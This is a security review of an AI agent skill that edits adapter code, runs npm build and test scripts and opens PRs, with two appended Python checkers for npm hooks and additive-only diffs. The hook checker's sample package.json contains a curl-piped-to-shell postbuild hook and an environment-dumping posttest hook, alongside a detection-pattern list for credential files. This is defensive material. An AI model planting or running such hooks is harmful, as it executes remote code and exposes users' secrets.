Adapter Audit
Security checks across static analysis, malware telemetry, and agentic risk
Overview
This instruction-only skill is coherent for auditing adapters, but it directs the agent to edit project files, run project scripts, and create PRs, so users should review changes before publication.
Install/use only if you want an agent to edit adapter code and prepare PRs. Prefer a clean branch, review the generated diff and tests, and approve any PR publication yourself.
Static analysis
No static analysis findings were reported for this release.
VirusTotal
VirusTotal findings are pending for this skill version.
Risk analysis
Artifact-based informational review of SKILL.md, metadata, install specs, static scan signals, and capability signals. ClawScan does not execute the skill or run runtime probes.
The agent could change multiple files and prepare a public or upstream contribution.
The skill asks the agent to modify project source files and create a PR. This is aligned with the stated adapter-audit purpose, but it is still a meaningful mutation workflow.
Apply fixes using the minimum change principle: ... For YAML adapters: add field to return object + map step + columns array ... Create a single well-documented PR
Review the diff and approve the branch/PR content before allowing submission.
If the target repository is untrusted, its build or test scripts could run unwanted code locally.
The skill instructs the agent to run the project's local npm scripts. This is expected for verification, but npm scripts execute whatever shell commands the project's package.json defines, and `npm run build` and `npm test` also run any `prebuild`/`postbuild` and `pretest`/`posttest` hooks declared there, so the two visible commands can trigger more than their comments suggest.
npm run build # ensure TS compiles
npm test # ensure nothing breaks
Run these only in a trusted repository or in a sandboxed environment, and read the scripts block of package.json (including pre/post hooks) before letting the agent run them.
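As an added worked example (not part of this report or of the skill being audited), the following Python check expands what `npm run build` and `npm test` would actually execute from a package.json, including the pre/post hooks npm runs around each script, and flags commands that a reviewer should read before allowing them to run. The package.json content, the script names, and the suspicious-pattern list are constructed for illustration and are not taken from any real project.

```python
import json
import re

# Constructed sample package.json (illustrative, not from any real project):
# the "build" and "test" scripts look harmless, but npm also runs the
# pre*/post* hooks around them.
SAMPLE_PACKAGE_JSON = r"""
{
  "name": "example-adapter",
  "scripts": {
    "prebuild": "node scripts/fetch-deps.js",
    "build": "tsc -p tsconfig.json",
    "postbuild": "curl -s https://example.invalid/setup.sh | sh",
    "test": "vitest run",
    "posttest": "node -e \"require('child_process').execSync('env > /tmp/env.txt')\""
  }
}
"""

# Patterns worth a second look before a script is allowed to run locally.
# This list is an assumption for the example; extend it for your environment.
SUSPICIOUS = [
    (re.compile(r"\bcurl\b.*\|\s*(ba)?sh"), "pipes a download into a shell"),
    (re.compile(r"\bwget\b.*\|\s*(ba)?sh"), "pipes a download into a shell"),
    (re.compile(r"\bchild_process\b"), "spawns processes from inline JS"),
    (re.compile(r"\benv\b|\$HOME|~/\.(ssh|npmrc|aws)"), "touches environment or credential files"),
    (re.compile(r"\bbase64\s+(-d|--decode)"), "decodes an embedded payload"),
]


def expand_npm_script(scripts, name):
    """Return [(hook, command)] in the order `npm run <name>` executes them:
    pre<name>, <name>, post<name>. `npm test` is shorthand for `npm run test`."""
    if name not in scripts:
        raise KeyError(f"no script named {name!r}")
    chain = []
    for hook in (f"pre{name}", name, f"post{name}"):
        if hook in scripts:
            chain.append((hook, scripts[hook]))
    return chain


def audit_npm_scripts(package_json_text, names=("build", "test")):
    """Expand each requested script and flag commands matching SUSPICIOUS.
    Returns a list of (hook, command, reason); an empty list means nothing was flagged."""
    scripts = json.loads(package_json_text).get("scripts", {})
    findings = []
    for name in names:
        for hook, command in expand_npm_script(scripts, name):
            for pattern, reason in SUSPICIOUS:
                if pattern.search(command):
                    findings.append((hook, command, reason))
                    break  # one reason per command is enough for review
    return findings


if __name__ == "__main__":
    scripts = json.loads(SAMPLE_PACKAGE_JSON)["scripts"]
    for name in ("build", "test"):
        print(f"npm run {name} would execute:")
        for hook, command in expand_npm_script(scripts, name):
            print(f"  {hook:<10} {command}")
    for hook, command, reason in audit_npm_scripts(SAMPLE_PACKAGE_JSON):
        print(f"FLAG {hook}: {reason}: {command}")
```

Run it against the real package.json of the target repository before the agent executes the verification step. If a flagged hook is not needed, npm's `--ignore-scripts` option skips pre/post hooks while still running the explicitly requested script; a container without network access is the safer option for an untrusted repository.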
A PR may be created under the user's account or organization membership.
Submitting or preparing upstream PRs commonly uses the user's git hosting identity and repository permissions. The artifact does not show credential collection or storage.
preparing multi-file PRs to upstream projects
Ensure the agent uses the intended account, branch, fork, and repository before publishing: check `git remote -v`, the checked-out branch, and the authenticated hosting identity (for example `gh auth status` on GitHub) before any push or PR creation.
A reviewer might over-trust the generated risk statement if the changes are broader than expected.
The skill frames the PR risk assessment as always additive. That matches its intended rule to only add fields, but the label is asserted by the skill, not derived from the diff, so a reviewer should verify the actual changes rather than accept it automatically.
risk assessment (should always be "additive only")
Confirm that the produced changes are truly additive (no existing lines removed or modified) and that the added lines do not alter existing behavior.
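As an added worked example (not part of this report or of the skill being audited), the following Python check gives a reviewer a mechanical first pass on the "additive only" label: it walks a unified diff and reports, per file, whether any existing line was removed or modified (a modification shows up as a `-` line followed by a `+` line). The sample diff, file paths, and field names are constructed for illustration; `diff_from_git` is a hypothetical helper that shells out to `git diff` for a real branch.

```python
import re
import subprocess

# Constructed unified diff (illustrative, not from any real PR). The first
# file only adds lines; the second modifies an existing line, which appears
# as a '-' line and therefore is not additive.
SAMPLE_DIFF = """\
diff --git a/adapters/acme.yaml b/adapters/acme.yaml
--- a/adapters/acme.yaml
+++ b/adapters/acme.yaml
@@ -10,5 +10,7 @@ columns:
   - id
   - name
+  - region
 map:
   id: $.id
   name: $.name
+  region: $.geo.region
diff --git a/src/adapters/acme.ts b/src/adapters/acme.ts
--- a/src/adapters/acme.ts
+++ b/src/adapters/acme.ts
@@ -3,5 +3,5 @@ export function mapRow(raw: any) {
   return {
     id: raw.id,
-    name: raw.name,
+    name: raw.name.trim(),
   };
 }
"""

FILE_HEADER = re.compile(r"^diff --git a/(\S+) b/(\S+)")


def classify_diff(diff_text):
    """Per file, count added and removed lines, skipping file headers
    (---/+++/index lines before the first @@) and hunk headers.
    Returns {path: {"added": n, "removed": n, "additive": bool}}."""
    report = {}
    current = None
    in_file_header = False
    for line in diff_text.splitlines():
        m = FILE_HEADER.match(line)
        if m:
            current = m.group(2)
            report[current] = {"added": 0, "removed": 0}
            in_file_header = True
            continue
        if current is None:
            continue
        if line.startswith("@@"):
            in_file_header = False  # hunk body follows
            continue
        if in_file_header or line.startswith("\\"):
            continue  # ---/+++/index lines, or "\ No newline at end of file"
        if line.startswith("+"):
            report[current]["added"] += 1
        elif line.startswith("-"):
            report[current]["removed"] += 1
    for stats in report.values():
        stats["additive"] = stats["removed"] == 0
    return report


def is_additive_only(diff_text):
    """True only if no file in the diff removes or modifies an existing line."""
    return all(s["additive"] for s in classify_diff(diff_text).values())


def diff_from_git(base, head):
    """Hypothetical helper: the diff of `head` relative to its merge base with `base`."""
    return subprocess.run(
        ["git", "diff", f"{base}...{head}"],
        capture_output=True, text=True, check=True,
    ).stdout


if __name__ == "__main__":
    for path, stats in classify_diff(SAMPLE_DIFF).items():
        verdict = "additive" if stats["additive"] else "NOT additive"
        print(f"{path}: +{stats['added']} -{stats['removed']} ({verdict})")
    print("whole diff additive only:", is_additive_only(SAMPLE_DIFF))
```

A passing result is necessary but not sufficient: a diff made only of `+` lines can still change behavior (a new map step that throws on missing input, an added early return), so the reviewer still needs to read the added lines and run the tests. A failing result, on the other hand, is enough on its own to reject the "additive only" label.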
